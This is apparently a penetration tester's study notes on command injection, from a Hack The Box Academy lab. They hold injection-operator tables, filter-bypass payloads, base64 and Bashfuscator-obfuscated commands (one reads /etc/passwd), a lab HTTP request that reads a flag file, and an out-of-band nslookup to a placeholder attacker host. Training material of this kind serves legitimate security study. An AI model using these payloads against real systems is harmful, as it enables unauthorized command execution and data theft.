# Command injection

{% hint style="info" %}

cmd injection list
{% endhint %}

| **Injection Operator** | **Injection Character** | **URL-Encoded Character** | **Executed Command**                       |
| ---------------------- | ----------------------- | ------------------------- | ------------------------------------------ |
| Semicolon              | `;`                     | `%3b`                     | Both                                       |
| New Line               |                         | `%0a`                     | Both                                       |
| Background             | `&`                     | `%26`                     | Both (second output generally shown first) |
| Pipe                   | `\|`                    | `%7c`                     | Both (only second output is shown)         |
| AND                    | `&&`                    | `%26%26`                  | Both (only if first succeeds)              |
| OR                     | `\|\|`                  | `%7c%7c`                  | Second (only if first fails)               |
| Sub-Shell              | ` `` `                  | `%60%60`                  | Both (Linux-only)                          |
| Sub-Shell              | `$()`                   | `%24%28%29`               | Both (Linux-only)                          |

{% hint style="info" %}
operators can be used for various injection types, like SQL injections, LDAP injections, XSS, SSRF, XML, etc. We have created a list of the most common operators that can be used for injections:
{% endhint %}

| **Injection Type**                      | **Operators**                                     |
| --------------------------------------- | ------------------------------------------------- |
| SQL Injection                           | `'` `,` `;` `--` `/* */`                          |
| Command Injection                       | `;` `&&`                                          |
| LDAP Injection                          | `*` `(` `)` `&` `\|`                              |
| XPath Injection                         | `'` `or` `and` `not` `substring` `concat` `count` |
| OS Command Injection                    | `;` `&` `\|`                                      |
| Code Injection                          | `'` `;` `--` `/* */` `$()` `${}` `#{}` `%{}` `^`  |
| Directory Traversal/File Path Traversal | `../` `..\\` `%00`                                |
| Object Injection                        | `;` `&` `\|`                                      |
| XQuery Injection                        | `'` `;` `--` `/* */`                              |
| Shellcode Injection                     | `\x` `\u` `%u` `%n`                               |
| Header Injection                        | `\r`  `%0d` `%0a` `%09`                           |

{% embed url="<https://academy.hackthebox.com/course/preview/whitebox-pentesting-101-command-injection>" %}

<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#bypass-without-space>

bypass spaces

(`127.0.0.1%0a{ls,-la}`)

{% hint style="info" %}
ip=127.0.0.1%0a{ls,-la,}

ip=127.0.0.1%0a{ls,-la,${PATH:0:1}home${PATH:0:1}}
{% endhint %}

limitation when slashes stripped or blacklisted

{% hint style="info" %}

```shell-session
echo ${PATH:0:1}
/

// to get semicolon
echo ${LS_COLORS:10:1}
;

understand how the above command resulted in a semi-colon, 
and then use it in the payload to use it as an injection operator. 
Hint: The printenv command prints all environment variables in Linux, 
so one can look which ones may contain useful characters, 
and then try to reduce the string to that character only.

Windows
echo %HOMEPATH:~6,-11%

Windows powershell
$env:HOMEPATH[0]

```

{% endhint %}

{% hint style="info" %}
127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt}\ <br>

```shell-session
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(rev<<<'imaohw')

base64 and bash
# find /usr/share/ | grep root | grep mysql | tail -n 1
echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64
bash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)


git clone https://github.com/Bashfuscator/Bashfuscator
# cat /etc/passwd
bash -c 'eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'

// final assessment:
GET /index.php?to=tmp%26bash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)&from=flag.txt&finish=1&move=1 HTTP/1.1

```

{% endhint %}

**Recommendations:**<br>

we should make sure that our back-end server is securely configured to reduce the impact in the event that the webserver is compromised. Some of the configurations we may implement are:

{% code overflow="wrap" %}

```
Use the web server's built-in Web Application Firewall (e.g., in Apache mod_security), in addition to an external WAF (e.g. Cloudflare, Fortinet, Imperva..)

Abide by the Principle of Least Privilege (PoLP) by running the web server as a low privileged user (e.g. www-data)

Prevent certain functions from being executed by the web server (e.g., in PHP disable_functions=system,...)

Limit the scope accessible by the web application to its folder (e.g. in PHP open_basedir = '/var/www/html')

Reject double-encoded requests and non-ASCII characters in URLs

Avoid the use of sensitive/outdated libraries and modules (e.g. PHP CGI)
```

{% endcode %}

Blind Cmd injection: \
127.0.0.1 && ping -c 10 127.0.0.1 &

out of band : \
127.0.0.1 & nslookup kgj2.web-atacker.com &